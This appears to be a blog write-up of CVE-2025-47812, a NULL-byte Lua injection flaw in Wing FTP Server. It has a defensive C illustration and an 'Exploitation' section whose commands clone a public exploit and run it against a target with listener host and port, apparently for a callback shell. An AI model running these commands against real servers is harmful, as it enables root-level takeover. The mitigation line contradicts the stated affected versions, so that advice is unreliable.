
CVE-2025-47812

Published: 08 June 2025 • Tags: CVE, Wing FTP, Linux, Exploit Development

🔎 Overview: A critical vulnerability in Wing FTP Server version <= 7.4.4 (CVE-2025-47812) allows an attacker to inject Lua code into a session file, which leads to RCE when the session is loaded and the Lua code is executed.

🧠 Summary:

RCE Security's Julien Ahrens found a serious security flaw affecting Wing FTP Server. The vulnerability, identified as CVE-2025-47812, has a CVSS score of 10. If it is successfully exploited, a remote, unauthenticated attacker could run arbitrary code and compromise the entire system. Wing FTP Server is a secure, user-friendly, cross-platform FTP server program. It provides versatility for client connections by supporting a number of file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP.

🧪 About the vulnerability:

When a user tries to log in, the server calls c_CheckUser, which always returns OK_CHECK_CONNECTION regardless of what follows a NULL byte in the username, as long as the string before the NULL byte matches an existing user. An attacker can exploit this by appending a NULL byte and extra data to a known username to bypass the password check. The server uses strlen() on the supplied username to determine its length, but strlen() only counts characters up to the NULL terminator, so only the prefix before the NULL byte is matched against known users. The unsanitized username (including the injected NULL byte and the payload that follows it) is then stored directly in a session file as Lua code.

These session files are effectively Lua files and are executed when the session is loaded. On Linux, Wing FTP Server runs as root; on Windows, it runs as SYSTEM, so the injected Lua payload runs with full privileges when the session is reloaded. Note: this behaviour only occurs if no password is set for the user or if valid credentials are supplied; if a password is set for the user, strict password validation is enforced.
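The length mismatch described above, as an added example in C that is not Wing FTP code: a strlen()-based lookup accepts a username with an embedded NUL because it only sees the prefix, while a hardened lookup rejects embedded NULs and compares the full wire length; the user list, constant values and function names are constructed for illustration.

```c
/* Constructed illustration of the check behind CVE-2025-47812 (not Wing FTP code).
 * The username arrives from the protocol layer with an explicit byte length,
 * but a strlen()-based lookup only sees the bytes before the first NUL. A
 * session writer that copies the raw buffer then persists everything after
 * the NUL as well. Enum values and the user list are assumed. */
#include <stddef.h>
#include <string.h>

enum { ERR_CHECK_USER = 0, OK_CHECK_CONNECTION = 1 };

static const char *KNOWN_USERS[] = { "anonymous", "alice" };
static const size_t N_USERS = sizeof KNOWN_USERS / sizeof KNOWN_USERS[0];

/* Vulnerable: strcmp()/strlen() stop at the NUL, so "anonymous\0<tail>"
 * compares equal to "anonymous" and the tail is never inspected. */
int check_user_vulnerable(const char *name, size_t len)
{
    (void)len;                            /* wire length ignored: the bug */
    for (size_t i = 0; i < N_USERS; i++)
        if (strcmp(name, KNOWN_USERS[i]) == 0)
            return OK_CHECK_CONNECTION;
    return ERR_CHECK_USER;
}

/* Hardened: reject any embedded NUL up front and compare the full wire length. */
int check_user_fixed(const char *name, size_t len)
{
    if (memchr(name, '\0', len) != NULL)
        return ERR_CHECK_USER;            /* embedded NUL: reject outright */
    for (size_t i = 0; i < N_USERS; i++)
        if (len == strlen(KNOWN_USERS[i]) && memcmp(name, KNOWN_USERS[i], len) == 0)
            return OK_CHECK_CONNECTION;
    return ERR_CHECK_USER;
}

/* Bytes (NUL included) that a raw-buffer session writer would persist beyond
 * what strlen() validated; a non-zero result is the condition to detect. */
size_t unvalidated_tail(const char *name, size_t len)
{
    const char *nul = memchr(name, '\0', len);
    return nul ? len - (size_t)(nul - name) : 0;
}
```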

🚀 Exploitation:

  • Download the exploit:

    git clone https://github.com/pevinkumar10/CVE-2025-47812.git
    cd CVE-2025-47812

  • Run the exploit:

    python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 -lport 31336

🧨 PoC (Proof of Concept):

💥 Impact:

Because the injected Lua code runs when the session file is loaded, a remote, unauthenticated attacker can execute arbitrary code as root on Linux or SYSTEM on Windows and fully compromise the host.

๐Ÿ›ก๏ธ Mitigation:

  • Upgrade to WingFTP version 7.4.4 to patch the vulnerability.
  • For more detail, see the references below.

📎 References: